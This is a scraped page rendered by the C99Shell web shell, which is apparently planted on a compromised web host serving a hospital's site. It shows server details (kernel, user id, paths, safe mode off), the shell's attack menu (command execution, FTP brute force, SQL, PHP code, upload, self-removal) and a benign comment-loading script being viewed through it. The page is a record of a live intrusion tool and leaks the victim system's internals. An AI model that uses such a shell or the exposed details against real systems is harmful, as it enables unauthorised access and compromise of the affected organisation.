!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/7.3.33 

uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC
2023 x86_64
 

uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) 

Safe-mode: OFF (not secure)

/home/katebhospital/public_html/   drwxr-x---
Free 984.23 GB of 3519.75 GB (27.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     load-comments.php (1.65 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<!-- Include JavaScript for loading more comments -->
<script>
    document.addEventListener("DOMContentLoaded", function () {
        const loadMoreButton = document.getElementById("loadMoreComments");
        const commentsContainer = document.querySelector(".single-comments");
        let page = 2; // Initial page number for loading more comments

        loadMoreButton.addEventListener("click", function () {
            const xhr = new XMLHttpRequest();
            xhr.open("GET", "load-comments.php?id=<?php echo $id?>&page=" + page, true);

            xhr.onload = function () {
                if (xhr.status === 200) {
                    const response = JSON.parse(xhr.responseText);

                    if (response.success && response.comments.length > 0) {
                        response.comments.forEach(function (comment) {
                            // Create and append new comment elements
                            const newComment = document.createElement("div");
                            newComment.classList.add("main");
                            newComment.innerHTML = `
                                <!-- ... (existing comment display code) -->
                            `;
                            commentsContainer.appendChild(newComment);
                        });

                        page++; // Increment the page number
                    } else {
                        // No more comments to load, hide the button
                        loadMoreButton.style.display = "none";
                    }
                }
            };

            xhr.send();
        });
    });
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.096 ]--